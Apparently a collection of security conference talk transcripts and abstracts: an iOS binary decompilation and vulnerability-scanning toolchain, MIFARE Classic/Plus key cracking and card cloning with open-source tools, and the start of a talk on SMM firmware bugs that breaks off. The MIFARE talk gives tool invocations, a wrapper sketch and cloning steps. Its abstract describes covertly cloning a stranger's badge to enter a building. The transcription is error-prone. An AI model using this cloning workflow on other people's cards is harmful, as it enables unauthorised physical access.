Hello, my name is Igor and heroism is Linares and Yuriy Slav. Our team does de-compilation and de-fuscation and has experience with most of the common architectures. We also do code analysis, source and binary, including a pentestine manual static analysis, and we also develop analysis tools. In today's talk, we would like to tell you about one of our analysis tools. So we were doing quite a lot of manual IOS security analysis and a significant part of the analysis process was the same from application to application. So we decided to write a tool that will do most of the work for us. Our goal was to develop a tool that would take an iTunes application link as an input and give us a security report and a record code as an output. So here is our plan. First we would like to obtain an application binary. Then we will translate this binary into some internal representation, analyze this representation for security flows, and then translate it into human readable pseudo code. This last step is important because we want to show each vulnerability in some human readable context. Okay, and the first part is how to get a binary. So getting an application binary is not as trivial as it may seem because all IOS apps are distributed through Apple App Store only and the binaries in the App Store are decrypted. Moreover, the only known way to decrypt an App Store application binary is to start the application on an IOS device, let devices processor decrypted and load it into memory and then dump the decrypted binary from memory. To make this work, we will need a jailbroken IOS device. And as we anyway need a jailbroken device to decrypt the application, we can use it to download the application as well. So this whole step, getting a binary, will be done on the jailbroken IOS device. So let's quickly review what we can do on a jailbroken IOS device. Of course, none of this is available on a stock IOS device without jailbreak. First of all, we can connect the device using ECCH protocol and get a nice bash command line. What is more, there is a code injection platform called CDSubstrate and it provides an API to call any method from a runtime of any Iranian IOS application and also allows us to hook any such method and change its implementation. And finally, there is Clutch out of the box tool to decrypt and dump IOS applications. So we decided to go with the highest level possible and just use graphical interface when convenient. That means that now we need to first figure out a chain of method calls and GUI decisions to initiate and manage the load and then figure out how to make needed GUI decisions programmatically. So in order to do that, we need to work with two built-in IOS applications, Springboard, App and App Store App. Springboard is a central application in the IOS graphical interface. So we needed its runtime to make our GUI decisions, like doing with some system other stuff. We also need to use App Store runtime to initiate the load. So we figured out this stuff and home to this chain of method calls. First of all, our tool unlocks device. Then it uninstalls the labs to make space and then opens an iTunes page like this one with target application. Then at this page, we need to press this get button. After that, App Store will ask us to sign in and there will be some alert and we need to fill our login and password and press OK. Then the load will start and we'll wait until this get button become open button. 
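As a rough illustration of that "obtain the binary" stage (not the team's actual tooling), the host side could drive a jailbroken device over SSH with something like the following. uiopen and the Clutch command line are standard jailbreak utilities, while the Substrate-based GUI automation that presses GET and signs in is only indicated by a placeholder here.

```python
# Minimal sketch of the download-and-decrypt stage, driven from the host over
# SSH to a jailbroken device (default root password on many jailbreaks is
# "alpine"). The on-device GUI automation is not reproduced.
import time
import paramiko

def ssh(host, password="alpine"):
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    client.connect(host, username="root", password=password)
    return client

def run(client, cmd):
    _, out, err = client.exec_command(cmd)
    return out.read().decode(), err.read().decode()

def fetch_decrypted(host, itunes_url, bundle_id, wait_s=120):
    dev = ssh(host)
    run(dev, f"uiopen '{itunes_url}'")       # open the App Store page
    # ... Substrate-driven taps (GET, sign in, wait for OPEN) happen on-device ...
    time.sleep(wait_s)                        # crude stand-in for "wait until installed"
    out, err = run(dev, f"Clutch -d {bundle_id}")
    print(out or err)                         # Clutch prints the dumped IPA path
    dev.close()
```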
Meaning that the application was downloaded and that we can come to the final step and decrypt it with Clutch. So now let me just show you how it's done. OK, so here I have an iPhone, this one, and the screen shows here. So I'm going to launch my script and see what happens. Now we need to wait a little bit. And that's it. And now it's complete. So that's how it works. OK, and next part is what we do after that. We are going to translate the decrypted binary into intermediate representation. So as soon as we get the decrypted binary, we need to translate it into the intermediate representation that is suitable for analysis and representing results of vulnerability search. As most translation tools, compilers as well as the compilers, we decided to use an intermediate representation that is more high level than the binary code, but more low level, that's source code. To obtain precise results, we have to deal with following challenges during binary translation. In particular, we have got a lot of things to recover. First of all, we need to separate functions from the data and attach names to these functions with correspondence to the function names from the source code, if possible, of course. For example, if the source code contains a function that disables certificate checks, we have to know its name to understand the source code semantics. Otherwise, it will be very difficult for us or even impossible to find vulnerabilities in such code. Moreover, we have to understand what arguments are passed to the function, and also we should know the values and types. Based on that information, we have to recover the original semantics of the program inside the IR, including the control flow graph of the program and the flow of the program. The majority of the source code is written in Objective C or Swift, so we have to recover runtime information interfaces from the binary file, that is, classes, interfaces, protocols, and other stuff. Applications are mostly FAT binaries that contain at least two executable images for the ARM architecture and for the RR64 architecture. At first, we supported translation for both ARM and RR64 architecture, but now, as developers and mobile platform owners are mostly focusing on the RR64 architecture, we have abandoned the ARM architecture support and do not support it anymore. Well, as I said before, we had to pick some intermediate representation that is suitable for representing binary program semantics and suitable for security analysis. So we decided to use the LVM as internal representation of a recovered code. LVM provides a handy static single-assessment-based intermediate representation that is well suited for representing C family programs, including Objective C programs and even Swift. Moreover, we can run multiple analysis, built-in LVM for program transformations and optimization, including the LES analysis, many of them, dominators, tree builders, loops analysis, and other transformations and optimizations. Also, we have much experience with this representation, so LVM was the perfect match for us. There are basic ideas that we implement in our translator. We implemented a high-performance tool that translates iOS applications to LVM. It can recover functions and function calls, arguments of that functions, and function types, recover control flow graph of the program, and reconstruct types and variables. During the translation and analysis, we also used all information about class and interfaces we were able to recover. 
This is the basic picture of how it works. Our tool receives binary application as input, passes the image, and creates an application memory model. Based on this memory model, we can extract information about classes, about functions, and recover the control flow graph of the application. To analyze this data using various algorithms based on the information we recovered before and based on the data flow of the program. So this is how we recover variables and even the types. After that, we generate the LVM representation and optimize it for better results. In the image-facing face, the decrypted binary is unpacked if necessary. The file format that is used for executable in iOS is called Mako. The Mako binary format was well-decommended until Apple removed the documentation from the public access. In the Silphriot and Mako parses, we extract information about program symbols and pass runtime information, as well as information on classes and interfaces of the application for both Objective-C and Swift. Once we pass the image, we start the process of recovering functions and the control flow graph of the program. For this purpose, we developed an iterative-requisite algorithm that takes a work list with addresses of functions starts as input. We use the following sources of function start addresses. There are entry points, addresses from the function starts section, function addresses obtained during runtime parsing. For example, function addresses from the Objective-C class definitions or virtual functions addresses from Swift or C++ virtual tables. The algorithm recursively traverses all the functions at known addresses and creates a control flow graph for each recovered function. We also have to take special care of trumplings and tail calls. Here you can see an example of trumpling for function of C release. During the translation, we replace this trumpling with a call to the real of C release. Once in ARM, often end with a tail call, which also should be accounted for in the CFG recovery. This is an example of an idiomatic code for the IS application. Function concludes with a tail call to the series. So we should take special care about it. As I mentioned earlier, we recover the information on interfaces of Objective-C and Swift classes. In particular, we are able to recover classes, protocols, method names, signatures for Objective-C classes for Swift. We can only recover the class hierarchy and create virtual tables for these classes. All our information on Swift classes is lost during compilation, so we are unable to recover it. We also implemented our own demagnar for Swift symbol names to make translation results more human readable. So there is an example of Recovery Objective-C interface. And there is an example of Recovery Oxygen information about an Objective-C class. There is encoded signature for each method of the class. We can decode the signature to get precise information about argument types and the region time type of this function. This slide shows us an example of Recovery Swift class. It's worth mentioning that we are unable to recover anything but class names and virtual tables. Even function names are missing and cannot be recovered from the binary. So as after we obtain the basic information about the functions, we run a series of analysis to get more precise information about the semantics of the program. 
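A minimal sketch of the work-list function recovery just described, using Capstone as the disassembler (my choice — the talk doesn't name one): seed the list with known entry points and Objective-C/Swift method addresses, disassemble linearly until a return or an unconditional tail branch, and queue the targets of direct calls.

```python
# Work-list recovery of function starts and straight-line instruction lists for
# an AArch64 image. Deliberately simplified: no basic-block splitting, no
# indirect branches, and tail calls are treated as function ends.
from capstone import Cs, CS_ARCH_ARM64, CS_MODE_LITTLE_ENDIAN

def recover_functions(code: bytes, base: int, seeds):
    md = Cs(CS_ARCH_ARM64, CS_MODE_LITTLE_ENDIAN)
    functions, worklist = {}, list(seeds)
    while worklist:
        start = worklist.pop()
        if start in functions or not (base <= start < base + len(code)):
            continue
        insns = []
        for insn in md.disasm(code[start - base:], start):
            insns.append((insn.address, insn.mnemonic, insn.op_str))
            if insn.mnemonic == "bl" and insn.op_str.startswith("#"):
                worklist.append(int(insn.op_str[1:], 16))   # direct call target
            if insn.mnemonic == "ret":
                break
            if insn.mnemonic == "b" and insn.op_str.startswith("#"):
                worklist.append(int(insn.op_str[1:], 16))   # likely tail call
                break
        functions[start] = insns
    return functions
```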
During analysis, we recover the memory objects used by the program, such as temporary variables, local and global variables, and most importantly for security analysis strings. We also recover types of variables and arguments. In our current implementation, we only support integer, float, and pointer types. But we are currently implementing the recovery of complex types, such as arrays and structs that has been already implemented in another hour in binary to LVM translation tool for the N-tool architectures. We can get more precise results using the knowledge base of known function signatures, for example standard library or widely used libraries like OpenSale and others. Moreover, the function signature information for Objective-C methods is encoded in the binary so it can be recovered and propagated during type recovery. Based on the obtained information, we generate an intermediate representation that preserves the semantics of the given program. The obtained model is optimized for further analysis. For example, we remove the code and run constant propagation paths, which is very useful when analyzing the function arguments. So let's see an example of ARM 2.0 LVM translation. This slide contains an example of an Objective-C function. It's actually a part of the function in a binary application. And this is how this function was translated to the LVM. So as you can see, we recovered names of called functions and precise argument types. And finally, this slide contains the control flow graph of the recovered function. So this is how binary recovery and translation is done by our translation tool. So, we have an LVM bytecode and we want to find vulnerabilities in it. At first, we decided that it would be better if we show our detected vulnerabilities in some human readable context. So we developed a tool that recovers some Objective-C suite-like pseudocode from LVM bytecode. The ultimate goal of this work is to develop the compiler. But for now, we are extracting all the information we can get from binary code. Names, signatures, call sites, arguments, type, statements, et cetera. We are improving structural analysis, which includes precise recovery of loops and if-else statements. It will make this tool much closer to the compiler. In SIEV binary code, we have less information than in Objective-C binary code. For example, we have no functional names. So Objective-C recovery is more accurate. But in most cases, there is enough information for interprets the detected vulnerabilities. When the application uses SIEV, it's binary contains both Objective-C and SIEV functions and during the binary translation, we determine which function is written on what language and we propagate this flag to the pseudocode. So depending on this flag, we use Objective-C or SIEV to print. Our research shows that the most dangerous vulnerabilities can be usually found by pattern matching. Also, pattern matching is fast, so it is important for large binaries. So we use pattern matching on LLVM for now. For other vulnerabilities, we will develop other data flow analysis algorithms, for example, sustained analysis and we have done it already for X86 architecture for detecting memory management bugs and formant string vulnerabilities. We find vulnerabilities in LLVM bytecode, so we want to demonstrate these vulnerabilities on pseudocode and we map LLVM instructions to pseudocode line numbers. So when we find some vulnerable instruction in LLVM bytecode, we can locate this vulnerability in pseudocode. 
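A toy version of that pattern-matching stage might look like the following; the rule list is only illustrative, not the product's actual signature set.

```python
# Toy pattern-matching pass: once calls and their constant arguments have been
# recovered into the IR, flag known-bad callee names and cleartext URLs.
import re

RULES = [
    (r"CC_MD5|CC_MD4|kCCAlgorithmDES", "weak cryptographic primitive"),
    (r"NSLog", "sensitive data may be written to the system log"),
    (r"setAllowsAnyHTTPSCertificate|allowsAnyHTTPSCertificateForHost",
     "SSL certificate checks disabled"),
    (r"UIPasteboard", "general pasteboard use (check for sensitive data)"),
]

def check_calls(call_sites):
    """call_sites: iterable of (function, callee_name, [constant args])."""
    findings = []
    for func, callee, args in call_sites:
        for pattern, message in RULES:
            if re.search(pattern, callee):
                findings.append((func, callee, message))
        for arg in args:
            if isinstance(arg, str) and arg.startswith("http://"):
                findings.append((func, callee, f"cleartext URL constant: {arg}"))
    return findings
```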
So let's discuss the vulnerabilities we can detect now. First of all, iOS applications can transfer sensitive and security-critical information via non-protected connections, and that makes the application vulnerable to a man-in-the-middle attack. Most applications from our research communicate with a main web server, like banking applications, so this type of vulnerability is very important. For example, an application can turn off the SSL certificate check. It often happens when developers forget to remove test code, and we can detect such functions. Also, an application can use the HTTP protocol to transfer some utility data, for example maps and so on, and this data can be tampered with, which can help an attacker to make a phishing attack or to change some application logic. We detect all constant strings in the binary, so we can find these connections. iOS applications also sometimes use insecure cryptographic functions for hashing, ciphering, random number generation, etc. — MD4, MD5, Triple DES, whatever. Also, an application can use a hard-coded encryption key, and the attacker can reverse the application, get this key and use it for sensitive data disclosure. So we can match these function names and find these vulnerabilities. Any application can gain access to the shared pasteboard, so developers have to turn off its usage, especially for important data. A common error is not to turn off NSLog usage. Information in the log can help an attacker, and this information can be simply viewed in Xcode if you connect your device to a computer — you don't even need a jailbreak. Finally, an application has to implement the function which describes its behavior in background mode. Otherwise, a screenshot will be saved in the application directory. This screenshot can contain sensitive information like credit card numbers, telephone numbers, etc., and information which is stored in the application directory can be stolen. Then, in iOS, developers can use reflection. They can call some methods by their names, and this way they can gain access to private API, which is prohibited by Apple and is insecure in some way. There are some important vulnerabilities that we don't detect yet. All the information that is stored in the application directory can be stolen, for example if the attacker has physical access to the device or the device is jailbroken. An application can store sensitive information unencrypted, or some security-critical information, in the application directory, in preference files, in local databases, or in the network cache. The important thing here is that insecure data storage is dangerous not only because it can lead to data leakage, but also because this data can be tampered with, and if this data is important — for example, if it defines some application behavior — the attacker can change this behavior. For example, we came across an application which stores its main web server address in preference files, so the attacker can change this address from HTTPS to HTTP and carry out a man-in-the-middle attack. The other example is when an application stores the number of unsuccessful authorization attempts in preference files, and this application becomes vulnerable to a brute force attack. Poor data validation vulnerabilities are less important for iOS applications than for web applications, but they still can be found here. Both poor data validation vulnerabilities and sensitive data leakage can be found by data flow analysis. We can track — we must track — the sensitive information through data flow.
The main problem here is that we can, we must determine which information is sensitive. So how can we tell that this variable contains, for example, passwords? We suggest some heuristics, for example, using, of course, variable names, then data ciphering, then some API functions as sensitive data source and, for example, some elements of interactive analysis to ask user which information is sensitive. This work is in progress. Then each application which operates some sensitive information shouldn't work on JVolkan device but the standard algorithm of JVolkan detection can be bypassed. So we can detect this algorithm, the application of this algorithm in binary code. I think the most important class of vulnerabilities here is authentication vulnerabilities, no two factor authentication, weak person complexity requirements and weak control of number of successful authorization attempts. This vulnerability is hard to detect, to be detected and usually they should be detected on server side. We have implementation for some server side and for Android applications and we want to apply these ideas to iOS applications. The main ideas of our approach is following. We detect the counter which is responsible for successful authorization attempts number and we detect password validation function and fuzz this function to recover its complexity requirements. Here is some piece of the demonstration. Here we show some assembly vulnerable snippet. In this snippet we call vulnerable function, function that turns off certificate check. Then we translate this code to LLVM, here is our call and finally we have this call and we see that the argument is one. So it's vulnerable in our studio code. So we have analysis report, this XML, we see what the source file, the line number and the vulnerability name. We use this tool for some bunch of applications and here is some statistics. We can show of course, this statistic represents the current states of our tool. Of course we have false positives. As I said, we will enhance our analysis engine but our tool shows these statistics and let's see. We presented our tool set. This tool set can find vulnerabilities in iOS applications only using its iTunes link and represent these vulnerabilities on human readable studio code. The future work is to enhance analysis, to develop data flow analysis algorithm, paint analysis, etc., to reduce number of false positives and to make our studio code closer to source code. So to develop a decompiler. Thank you for your attention. Any questions? Not a question, just a comment. We thought about finding in the body of binary API keys for example for Amazon or other services. If you have API key, you can use the server and sometimes some developers they include not only these keys, they include also private keys for SSL. It happens but we don't detect it automatically yet. Hi first great tool. Do you have any plans on releasing it? The source? No, fortunately it's a proprietary tool. Okay and so you showed some statistics on how many apps. Is that statistics based? A couple of hundreds. And then I was just wondering a lot of apps will introduce full SDKs so there will be maybe two or three functions for SSL pin checking or I don't know other functionalities obfuscation. Are those things taught about in the tool? 
For example, if banking applications use official SDKs, let's say, and they have functionality which is in the SDK — so you will have SSL pinning, which is a functionality in the SDK — but it's not because it's in the source or in the binary that the application actually uses it. Do you see what I mean? Not quite, sorry. Yeah, okay, well, no problem. No, no problem, oh well. Thank you.
|
The main goal of our work is to find out a sensible way to detect vulnerabilities in binary iOS applications. We present a new fully featured toolset, that constitutes a decompiling and analyzing engine, targeting ARM/AArch64 programs, particularly iOS applications. In general, the analysis workflow consists of four steps: Downloading and decrypting an iOS application from AppStore. We introduce the iOS-crack engine that is capable of automatic downloading, decrypting and dumping memory of AppStore applications using a jailbroken device. Decompiling the iOS application. The toolset is capable of carrying out a completely automated analyses of binary programs, using the LLVM as the intermediate representation language. Unlike known binary code to LLVM translation tools, our decompilation tool aims at a high-level program semantics reconstruction. That is: program CFG reconstruction, advanced analysis and propagation of memory objects and stack pointer tracking, data types reconstructions, program data model construction. Almost all iOS application are written in Objective-C or Swift, so we also take care about precise types reconstruction and use the runtime types information in decompilation process. Static analysis of the iOS application. We introduce our static analysis framework that is able to find all common vulnerabilities of mobile applications, especially iOS applications. Representation of analysis results. The toolset is able to produce a human-readable pseudocode representation of the source binary. During the presentation we will demonstrate our analysis engine in action. We will show real-world examples of the most common security flaws and how they can be found.
|
10.5446/32395 (DOI)
|
So my name is Kevin Larson. This is a talk on MIFARE Classic cracking, and it's not going to get into just what maybe many of you already know. Have you heard of MFOC? MFCUK? A few people. Alright. Those have been around for quite a while, so with MIFARE Classic cards you've been able to clone or crack them with free open source tools for quite a while. But a little bit about me: I'm a software engineer at Honeywell. The disclaimer: this is all my work for my master's degree, nothing to do with my employer. Also a note, I'm not disclosing anything that's brand new, that's not already freely available on the web, so NXP hopefully can't come run after me when I leave. The MIFARE Classic card, in essence, is really just a simple storage device. There's read/write access per block, and this is used for things like eWallet, access control, transportation systems, getting in and out of your hotel. And if you notice, maybe at your hotel, if you wanted a late checkout they might say you have to bring your hotel card down to the front desk, we'll re-scan it, and you can check out an hour later. What you can really tell by that is there are some things that are not networked. They're not doing server-side checks. There are local checks being done based on the data on the card. The MIFARE Classic actually used a custom crypto library called Crypto-1, and the core of that has been broken for quite some time. A little background on the MIFARE memory layout: this is a 1K card, so there are 16 sectors with four blocks each, and there's a key A and a key B, depending on whether you want to read or write data, for each block. So for a typical card there's going to be some default information that the manufacturer wants you to be able to read, in order to get into the door or just know what the card is. Then there may be some encrypted data, like the check-in and check-out time at a hotel, or things like that. These really are card-only attacks. What that means is I don't need to be — there are separate, different attacks if you can actually stand next to a reader with a card and watch someone actually trying to authenticate. This is only if you have the card by itself, or if you're next to maybe someone on a subway, if you're in extremely close proximity. So what we're really using here, the basis, is the nfc-tools for MIFARE Classic: MFOC and MFCUK. MFOC relies on the fact that you know one key on the entire card, and based on that you can do some attacks to get all the keys on the rest of the card. In practice there's almost always one default key of all F's, just so you can read the card type and the size and things like that. There's also another tool called MFCUK if you don't know any keys on the card. It takes a lot longer, it's not quite as practical, and it's very rare you'll actually need that. So NXP responded to these tools after a while with the MIFARE Plus card, which has an AES option. What that means is that they really wanted to be able to allow people to update their readers in a building or a transportation system while still using the old cards — updating some readers and leaving some at the same time — because it's too expensive, the infrastructure cost, to actually update everything all at once. What this means, though, is that you may be using AES for some readers, but you're still using the old system with the Crypto-1 custom library for old readers. The other thing they did do is they fixed the pseudorandom number generator, so it's not vulnerable to MFOC or MFCUK.
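For reference, the 1K layout described above maps directly onto the 1024-byte dumps the open source tools produce: 16 sectors of four 16-byte blocks, with the last block of each sector (the sector trailer) holding key A, the access bits and key B. A small sketch that pulls the keys out of such a dump, assuming the cracking tool has filled the key bytes in (a genuine read returns them blanked):

```python
# Pull the per-sector keys out of a 1K MIFARE Classic dump
# (.mfd style, 16 sectors x 4 blocks x 16 bytes).
import sys

def sector_keys(dump: bytes):
    assert len(dump) == 1024, "expected a 1K card dump"
    keys = []
    for sector in range(16):
        trailer = dump[(sector * 4 + 3) * 16:(sector * 4 + 4) * 16]
        key_a, access, key_b = trailer[:6], trailer[6:10], trailer[10:16]
        keys.append((sector, key_a.hex(), access.hex(), key_b.hex()))
    return keys

if __name__ == "__main__":
    with open(sys.argv[1], "rb") as f:
        for sector, key_a, acc, key_b in sector_keys(f.read()):
            print(f"sector {sector:2d}: key A={key_a}  access={acc}  key B={key_b}")
```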
So I don't know if any of you using that and you have a new card you're trying to use and it's not working. You can sit and try all night it's not going to work. So what they've done is they fixed this so it's a little bit more secure. So there's been some research done by Carlo and Roll. They found new card only attacks for the my fair plus in SL1 mode. SL1 means that you have the old crypto one library being used for the old readers along with potentially another block on the card using AES. This is important because most installations did not completely reinstall all of their readers. So my goals really were to reproduce the attack and see if I could make it faster. See if I could make it real time. Could I really bump into someone like you see in the movies? Could you bump into someone on a subway? Actually copy their card follow them into work things like that. So some of the hardware tools I used was the SCL 3711. It's just like a $30 USB reader. The Proxmark which gets a little bit more expensive but has a very active community. So that was really a useful tool to learn the core of what I needed to do. My fair plus cards and the reader with config software to actually take factory fresh cards configure them like a hotel might or a transportation system. And then I bought this crappy eBay lock for $80 off eBay. If you want to get checked by TSA put one of those in your check bag. One other thing to note is that the mistake I made in buying this is actually not all my fair classic readers except my fair plus as was intended. The my fair plus card takes a little bit longer for the authentication. So this lock actually doesn't even work with my fair plus cards. So the new attack is it's dubbed the hard nested attack because it's it's an extension of the existing nested attack on my fair plus cards which have a hardened PRNG. It still requires one known key and what you do is you take you do many attempts at a nested authentication. You collect the encrypted unique encrypted nonces between the known sector you have the key for and unknown sector you're trying to get the key for. With enough of those tries there's some leak bits and you can you're basically trying to do is reduce the key space from like two to the 48 which is a my fair classic key size down to about two to the 20 maybe a little bit bigger but then from there you can do a brute force. So what did I actually do? I tried to improve the attack but but really there's there's people who don't sleep and a lot smarter than me who work on this all the time and they basically reduce that down to almost the physical constraint of just the time it takes to authenticate a card to the reader. So my goal is really just to make this easy to use. It took me a month or two of you know my spare time and a fair amount of money to get this up and running so I figured if I can do it for 20 bucks and no one has to type in a single command then maybe it'll get used a little bit more. So the point of this is I think everybody's lazy I'm lazy. If you don't know if you have a my fair classic or my fair plus you don't know what kind of pseudorandom number generator it has you don't want to spend $200 or a month trying to figure this out. All you have to do is download this there's a installed script and you can run it with no arguments to find the keys on your card. So really what I did here is I modified the libNFC version of MFOC to identify if it has a new pseudorandom number generator which is not vulnerable or the old one. 
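The "no arguments" flow the speaker is aiming for boils down to: probe the card, run the classic nested attack if the PRNG is weak, fall back to the hardnested cracker otherwise, then offer to clone. A rough sketch driving the external tools — tool names are from the libnfc ecosystem, but the exact flags and the retry logic here are illustrative, not the actual tool's code:

```python
# Rough sketch of the wrapper logic: try MFOC first, fall back to the
# hardnested cracker for the remaining keys, then write the dump out to a
# "magic" UID-writable card.
import subprocess

def run(cmd):
    proc = subprocess.run(cmd, capture_output=True, text=True)
    return proc.returncode, proc.stdout + proc.stderr

def crack(dump_file="card.mfd"):
    rc, out = run(["mfoc", "-O", dump_file])
    if rc == 0:
        return dump_file
    if "hardened" in out.lower() or "not vulnerable" in out.lower():
        # The real wrapper only targets the keys MFOC reported as unknown;
        # here we naively sweep every sector trailer with both key types,
        # seeded with the common all-FF default key on the last sector.
        for block in range(3, 64, 4):            # each sector's trailer block
            for key_type in ("A", "B"):
                run(["libnfc_crypto1_crack", "ffffffffffff", "60", "B",
                     str(block), key_type])
        # In the real flow the recovered keys are fed back (e.g. via mfoc -k).
        rc, out = run(["mfoc", "-O", dump_file])
        if rc == 0:
            return dump_file
    raise RuntimeError("could not recover all keys:\n" + out)

def clone(dump_file):
    # 'W' also writes block 0 (the UID), which only works on magic cards.
    run(["nfc-mfclassic", "W", "a", dump_file])
```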
I modified the libnfc version of the hardnested attack to hold on to some more information so I can automate this, and you don't have to figure out which keys are unknown and type in more parameters. I also created a wrapper script to figure this all out, so you can just run it with no arguments. So here's a kind of static demo of what would happen if you didn't know whether you had a MIFARE Classic or a MIFARE Plus. You would just run miLazyCracker, the script, and the first thing you would see is it identifying whether you have a MIFARE Classic or a MIFARE Plus card, and from there it picks which attack to use. In this case it's a MIFARE Plus, and it highlights which keys are unknown in which sectors and just recursively goes through and finds those keys for you. So in this case it says the PRNG is not vulnerable to the nested attack, so it selects the hardnested attack. In the red there, it's selecting the parameters for you so you don't have to understand what they mean. What that's actually doing is saying: I know that block 60, key B, is all zeros; you can use that to try to authenticate against another, unknown sector, block 48, key B, and try to crack that. As it goes through, it's finding each key for you, and in the red you can see that it finds separate keys for key A and key B, and there's still one key left. Sometimes the attack does fail: it tries to reduce the key space down to a certain size, and due to some math I don't understand it gives up once in a while; if you just try again it seems to work. So in this case it's found three keys, and once you've found all keys for all sectors it just dumps the card to a binary file. From there you can clone the card with the nfc-mfclassic open source tool, which is included in the script; I made it so it just asks you, do you want to clone it, yes or no, so you can put a blank card on there if you want to copy it, and you have a clone of the card. The caveat is that the UID on a MIFARE Classic card is read-only, and there are Chinese "magic" cards which allow you to write to that block, so you do need to go to Alibaba or something and buy some magic MIFARE Plus or magic MIFARE cards. The source code is released, it's on GitHub, and it's been tested by a few people. If you ever go to Troopers in Heidelberg, Germany, there's a great training called RFID Security and Privacy Nightmares; the guys that give that training were the ones that got me interested in this, so I highly recommend it if you're heading to Troopers this year. And I have a short demo here if you want to see it live. So here I have a MIFARE Plus card, one you could not crack with MFOC, and all you have to do is run this, if you can actually see it.
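For readers following along without the live demo, the decision flow of the wrapper described above boils down to roughly the sketch below. The helper names, flags and the "hardened PRNG" marker string are assumptions for illustration, not the actual miLazyCracker source; check the GitHub repository for the real thing.

```python
# Sketch of the wrapper flow (hypothetical helper names, flags and output
# markers; not the actual miLazyCracker source): detect the PRNG type, then
# pick the nested attack (MFOC) or the hardnested attack accordingly.
import subprocess

def prng_is_hardened(output: str) -> bool:
    # Assumption: the modified MFOC prints some marker when it sees the fixed
    # ("hardened") pseudorandom number generator.
    return "hardened PRNG" in output

def crack_card(dump_file: str = "card_dump.mfd") -> None:
    probe = subprocess.run(["mfoc", "-O", dump_file],
                           capture_output=True, text=True)
    if probe.returncode == 0:
        print("Weak PRNG: the MFOC nested attack succeeded, dump written.")
        return
    if prng_is_hardened(probe.stdout + probe.stderr):
        # MIFARE Plus SL1 / hardened Classic: fall back to the hardnested
        # attack, one unknown key at a time. Argument order mirrors the static
        # demo (known key 000000000000 on block 60 key B, target block 48 key B);
        # verify against the tool's own usage text.
        print("Hardened PRNG detected, switching to the hardnested attack.")
        subprocess.run(["libnfc_crypto1_crack",
                        "000000000000", "60", "B", "48", "B"])
    else:
        print("Attack failed; re-run, the key-space reduction sometimes gives up.")

if __name__ == "__main__":
    crack_card()
```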
So what it's doing here, and I'll start it over so you can see it: I just ran the script with no parameters. You can see here that there are two keys that are unknown, key A and key B for sector 13. All it's trying to do is authenticate to the card over and over and over again, collecting different unique encrypted nonces, and after a period of time, which varies depending on the card and the key, it finishes. While that's running, I have another demo with a real lock; if you're interested you can stop by and see me afterward. This one actually works with MIFARE Classic; it doesn't work with the Plus, because it's a bad lock I bought off eBay. You can see here, this is a card that actually allows me to enter the room, it turns blue, and this is a key that does not, and another key that does not, and I'll show you that I can clone that and enter the door pretty quickly. This has a runtime of approximately, I would say, five minutes to an hour, and I didn't pick a key that takes an hour, don't worry. In the output of the script you can see that it said the PRNG is not vulnerable to the nested attack, so it automatically selects the sectors to use, and here it reduced the key space down to about 2^36, so it's going to brute force from there. This might go a little bit faster with a better laptop, but it should do the trick. Another note, I guess, for things like hotels: most of them are using their own version of encryption or their own data format on the card, so it's not like being able to crack the card for one hotel lets you change your check-in time at every hotel; things like that are typically proprietary. So in this case it has found the keys on this card and asks, do you want to clone the card? You can say yes or no, put a new card on, and you'd be able to clone it. And here's a case where this card did not let me into the lock before. I'm just going to run the script, and in this case it's not a MIFARE Plus card, so it cracks it very, very fast, and I can say yes, clone the card. I cloned the wrong one; that's the demo effect, and that's why I had a static demo. All right, here's the card that got me in, and yes, I want to clone it onto my Chinese clone card, which doesn't want to stay on the reader, so I say yes. And now I can get in. Any questions? For the phase where you collect the nonces, do you need to have the card physically present the whole time, or can you do a dump? You need to have the card. In order to do a dump you have to have the keys, so in order to read certain sectors you need the keys. So you need to have the card on the reader during the collection process, but you don't need it for the brute force phase. Okay, how long does the gathering take, how long do you need physical access to collect it? It typically depends on the card, or the key, or which key it is; from what I've seen it's between five minutes and an hour. So it's certainly not a case where you can just bump into someone and steal it; maybe if you're on a long train ride. All right, thank you.
|
The presentation will show how easy it can be to crack not just Mifare Classic but the new Mifare Plus, which has an improved PRNG that nullifies MFCUK/MFOC, the tools that currently crack Mifare Classic. I have taken portions of code from the Proxmark3 and LibNFC to combine into one tool that works with a $30 USB reader which looks just like a USB thumbdrive, and requires no arguments whatsoever. Simply place a card on the reader and run: $ ./miLazyCracker The script will talk to the card, determine if the PRNG is vulnerable or not, and select the proper attack. From there it will iterate through any missing keys and finally dump the card so it can be cloned. The talk also shows how to create cards with open source tools (this part is not new but it’s easily explained). I am a Masters student in Computer Science, have worked with embedded devices for about 10 years, and most recently worked in cyber security research. I love everything smart card related, wireless (Zigbee, Z-Wave, 6LoWPAN), hardware hacking, reversing .NET and patching programs to do crazy stuff. I think this is cool because anyone can clone a card (or see if it's clonable) with no prior knowledge of smart cards, no learning about sector layouts, and no arguments to give to the script whatsoever, and it only takes a $30 part which looks like a USB thumb drive. This makes it very possible to sit on a bus or subway next to the lady who has her badge in her purse and potentially clone her card, follow her to work and gain access to a building. It's not necessarily the most novel reverse engineering feat, but it brings smart card cloning (and attacks as recent as 6 months old) to the masses. This isn't so more people can break in, but so companies can be aware of how easy this is and move away from anything with the name Mifare.
|
10.5446/32396 (DOI)
|
Hey guys, my name is Alex, here is Yuri. We are working in the Advanced Threat Research team at Intel, and we are here to present a new talk, BARing the System: new vulnerabilities in Coreboot and UEFI-based systems. Before we go to the presentation, I want to say thank you to the organizers of REcon, Hugo and team, and REcon Brussels. Thank you very much. So today we will present a new type of vulnerability. On our agenda we have a small recap of the previous vulnerabilities, then an introduction to memory-mapped I/O, then a description of the MMIO BAR overlap issue, examples of this issue in UEFI firmware and Coreboot firmware, limitations, mitigations, tools, and the conclusion. The recap is really important for this presentation because the new vulnerability is similar to the previous ones in many respects, including exploitability in the modules where we found them. So what is an SMI pointer bug? On an x86 system you have a couple of privilege levels, and the most privileged is SMM, and there is a mechanism to communicate between the operating system and SMM mode. It goes like this: the operating system allocates a buffer, then passes the address of the buffer through some structure, depending on the version of the firmware, and then the SMM code reads that buffer and, depending on the functionality, can read or write. In EDK I based firmware, the address of the buffer is passed through a general purpose register, RBX. In EDK II, there is a mechanism named the CommBuffer, and the address of the CommBuffer is passed through a UEFI ACPI table. In normal behavior, the address of this CommBuffer is somewhere controlled by the operating system. But if we point the address back into SMRAM and SMM doesn't have a check, we have an arbitrary write inside SMRAM. Using this write primitive, we usually control the address where to write, but we often don't control the data; in some of the exploits we demonstrated previously, we write zeros. And then, to make an exploit, we find a structure in the saved CPU state, the SMBASE register, and when we overwrite this register, the next SMI will start executing from 